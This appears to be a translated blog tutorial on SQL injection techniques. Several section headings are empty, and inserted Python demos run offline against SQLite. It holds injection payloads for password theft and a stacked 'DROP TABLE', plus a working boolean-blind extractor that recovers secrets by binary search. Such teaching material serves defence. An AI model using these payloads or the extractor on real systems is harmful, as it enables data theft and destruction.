iloveflag-blog

SQL injection

Word count: 404, reading time: 1 min
2019/07/13

Union queries and ORDER BY

Blind SQL Injections

About Blind SQL Injections
In a reasonably good production application you generally cannot see error responses on the page, so you cannot extract data through UNION attacks or error-based attacks. You have to use Blind SQL Injection attacks to extract data. There are two kinds of Blind SQL Injection.

Normal Blind: you cannot see a response in the page, but you can still determine the result of a query from the response or the HTTP status code.
Totally Blind: you cannot see any difference in the output of any kind. This can be an injection into a logging function or similar. Not so common, though.
When database contents cannot be obtained directly from what the page displays, you have to infer them by other means or by trial; that process is blind injection.

Boolean-based blind injection (inferred from the content the page returns)

MySQL IF statement
IF(condition, true-part, false-part) (M = MySQL)
SELECT IF(1=1, 'true', 'false')

Using CONCAT() in MySQL
SELECT CONCAT(CHAR(75), CHAR(76), CHAR(77)) (M)
This returns 'KLM'.

HAVING is used together with GROUP BY to filter the grouped rows, and it may use aggregate functions. The cheat-sheet payload below is an error-based trick (MSSQL): each invalid GROUP BY / HAVING combination produces an error message naming the next column, so column names are leaked one at a time. It relies on visible errors, so it belongs with error-based rather than boolean-blind injection.
' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
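The following is an added example, not code from the blog: it turns the "row exists / no row" page states described above into a one-bit oracle and uses a binary search to recover a string, which is how boolean-blind extraction is actually automated. The users table, the `vulnerable_page()` endpoint and the `BlindExtractor` class are all hypothetical and constructed so the script runs offline against SQLite; SQLite's `UNICODE(SUBSTR(...))` and `LENGTH()` stand in for MySQL's `ASCII(SUBSTRING(...))` and `LENGTH()`, and the `IF()` of the section is not needed because the condition is placed directly in the WHERE clause.

```python
import sqlite3

# Added example (not the blog's own code). Everything below is hypothetical:
# a constructed users table stands in for the target database, and
# vulnerable_page() stands in for an endpoint that only says whether a row
# exists. The bit-extraction logic is the same on MySQL with IF(), LENGTH()
# and ASCII(SUBSTRING(...)).


def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    db.execute("INSERT INTO users (name, password) VALUES ('admin', 'S3cr3t!')")
    db.execute("INSERT INTO users (name, password) VALUES ('bob', 'hunter2')")
    return db


def vulnerable_page(db: sqlite3.Connection, user_id: str) -> str:
    """Vulnerable endpoint: `user_id` is concatenated into the query, and the
    page reveals only whether a row came back (no data, no error text)."""
    sql = "SELECT name FROM users WHERE id = " + user_id
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        row = None  # errors are swallowed: the page looks the same as "no row"
    return "User exists" if row else "No such user"


class BlindExtractor:
    """Turns the two page states into a 1-bit oracle and extracts strings."""

    def __init__(self, db: sqlite3.Connection):
        self.db = db
        self.requests = 0  # attack cost, in HTTP requests

    def oracle(self, condition: str) -> bool:
        self.requests += 1
        # id = 1 exists, so the page state now depends only on `condition`
        return vulnerable_page(self.db, f"1 AND ({condition})") == "User exists"

    def find_int(self, expr: str, lo: int, hi: int) -> int:
        """Binary-search the integer value of SQL expression `expr` in [lo, hi]."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.oracle(f"({expr}) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract(self, subquery: str, max_len: int = 64) -> str:
        """Recover the string returned by `subquery` one character at a time."""
        length = self.find_int(f"LENGTH(({subquery}))", 0, max_len)
        chars = []
        for i in range(1, length + 1):
            # UNICODE(SUBSTR(...)) plays the role of MySQL's ASCII(SUBSTRING(...))
            code = self.find_int(f"UNICODE(SUBSTR(({subquery}), {i}, 1))", 0, 127)
            chars.append(chr(code))
        return "".join(chars)


def demo() -> tuple:
    """Returns (recovered secret, number of requests it took)."""
    db = build_db()
    ex = BlindExtractor(db)
    secret = ex.extract("SELECT password FROM users WHERE name = 'admin'")
    return secret, ex.requests


if __name__ == "__main__":
    secret, n = demo()
    print(f"recovered {secret!r} in {n} requests")
```

Binary search costs about 7 requests per character instead of up to 127 with a linear scan, which is why blind extraction is feasible at all. For the time-based variant in the next section only `oracle()` changes: instead of comparing page text it measures response latency of a payload such as MySQL's `IF(cond, SLEEP(3), 0)`, and the rest of the extraction loop is unchanged.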

Time-based blind injection (inferred from the page's response time)

Error-based injection

Second-order injection

Basically, you put an SQL injection payload in one place and expect it to be used unfiltered in another action. This is a common hidden-layer problem: the first action stores the payload safely, and a later action trusts what it reads back from the database.

Name : ' + (SELECT TOP 1 password FROM users ) + '
Email : xx@xx.com

If the application later uses the name field in an unsafe stored procedure, function, process, etc., it will insert the first user's password as your name (or wherever else the name ends up).
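As an added example (not the blog's code), the two-step scenario above carried through end to end: registration stores the payload with a parameterised INSERT, and a later "record login" step reads the name back and concatenates it into a new statement, so the victim's password lands in an activity feed the attacker can read. The application, its tables, the activity feed and `PAYLOAD_NAME` are all constructed; SQLite's `||` and `LIMIT 1` take the place of the MSSQL `+` and `TOP 1` in the post's payload. The hardened `record_login_safe()` is shown beside the vulnerable one.

```python
import sqlite3

# Added example (not the blog's own code). The application, its tables and the
# "activity feed" are hypothetical, constructed so the scenario runs offline.
# The blog's payload targets MSSQL ('+' concatenation, TOP 1); SQLite's '||'
# and LIMIT 1 play the same role here.

PAYLOAD_NAME = "' || (SELECT password FROM users WHERE name = 'alice' LIMIT 1) || '"


def setup() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, "
               "email TEXT UNIQUE, password TEXT)")
    db.execute("CREATE TABLE activity (id INTEGER PRIMARY KEY, message TEXT)")
    db.execute("INSERT INTO users (name, email, password) VALUES (?, ?, ?)",
               ("alice", "alice@example.com", "alice-secret-pw"))
    return db


def register(db: sqlite3.Connection, name: str, email: str, password: str) -> None:
    """First action: parameterised, so the payload is stored as harmless text."""
    db.execute("INSERT INTO users (name, email, password) VALUES (?, ?, ?)",
               (name, email, password))


def record_login(db: sqlite3.Connection, email: str) -> None:
    """Second action (vulnerable): the name is read back from the database,
    treated as already trusted, and concatenated into a new statement."""
    name = db.execute("SELECT name FROM users WHERE email = ?", (email,)).fetchone()[0]
    db.execute("INSERT INTO activity (message) VALUES ('" + name + " logged in')")


def record_login_safe(db: sqlite3.Connection, email: str) -> None:
    """Hardened form: data stays data no matter where it came from."""
    name = db.execute("SELECT name FROM users WHERE email = ?", (email,)).fetchone()[0]
    db.execute("INSERT INTO activity (message) VALUES (?)", (name + " logged in",))


def activity_feed(db: sqlite3.Connection) -> list:
    """What a user of the hypothetical site sees on the activity page."""
    return [row[0] for row in db.execute("SELECT message FROM activity ORDER BY id")]


def run(safe: bool) -> list:
    """Register with the payload as a name, log in, return the feed."""
    db = setup()
    register(db, PAYLOAD_NAME, "xx@xx.com", "attacker-pw")
    (record_login_safe if safe else record_login)(db, "xx@xx.com")
    return activity_feed(db)


if __name__ == "__main__":
    print("vulnerable:", run(safe=False))
    print("hardened:  ", run(safe=True))
```

The lesson is that "it came from our own database" is not a sanitisation step: the second statement must be parameterised exactly like the first. Searching a code base for queries built from values previously read out of the database is the practical way to find this class.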

Wide-byte injection

Stacked-query injection

Stacked queries means executing a sequence of several queries over a single database connection; put simply, running multiple statements in one call. Whether an injection can be stacked therefore depends on the database and on the driver API the application uses, not only on the injection point.
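As an added example (not the blog's code), the same injectable lookup run through two driver APIs: Python's `sqlite3.execute()`, which refuses to run more than one statement per call, and `executescript()`, which runs the whole string, so the stacked `DROP TABLE` in the payload actually executes. The notes table, the endpoint functions and `PAYLOAD` are constructed for the demo; the comparison to other drivers in the comments is illustrative.

```python
import sqlite3

# Added example (not the blog's own code). The notes table, the endpoint and
# the payload are constructed; the point is that stacking only works when the
# database driver is willing to run more than one statement per call.

PAYLOAD = "1; DROP TABLE notes; --"


def setup() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE notes (id INTEGER PRIMARY KEY, body TEXT)")
    db.execute("INSERT INTO notes (body) VALUES ('hello')")
    return db


def table_exists(db: sqlite3.Connection, name: str) -> bool:
    row = db.execute("SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?",
                     (name,)).fetchone()
    return row is not None


def lookup_one_statement(db: sqlite3.Connection, note_id: str) -> bool:
    """Injectable, but through an API that runs exactly one statement:
    sqlite3's execute() rejects the second statement, so stacking fails.
    Returns True if the statement ran at all."""
    sql = "SELECT body FROM notes WHERE id = " + note_id
    try:
        db.execute(sql).fetchall()
        return True
    except (sqlite3.Warning, sqlite3.Error):
        # older CPython raises sqlite3.Warning here, newer ProgrammingError
        return False


def lookup_stacked(db: sqlite3.Connection, note_id: str) -> bool:
    """Same injection through an API that runs a whole script (executescript()
    here; comparable to mysqli_multi_query() in PHP or MSSQL's default
    handling of ';'-separated batches)."""
    sql = "SELECT body FROM notes WHERE id = " + note_id
    db.executescript(sql)
    return True


def demo(stacked: bool) -> tuple:
    """Returns (statement ran, notes table still exists) after the payload."""
    db = setup()
    ran = (lookup_stacked if stacked else lookup_one_statement)(db, PAYLOAD)
    return ran, table_exists(db, "notes")


if __name__ == "__main__":
    print("single-statement API:", demo(stacked=False))
    print("script API:          ", demo(stacked=True))
```

When testing for stacked injection, a quick check is therefore a harmless second statement whose effect you can observe (a `SLEEP`, or an `UPDATE` to a row you control) rather than assuming a `;` in the payload will be honoured.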

X-Forwarded-For (XFF) injection

User-Agent HTML injection

JSON injection

Web漏洞挖掘速成特训营.pdf
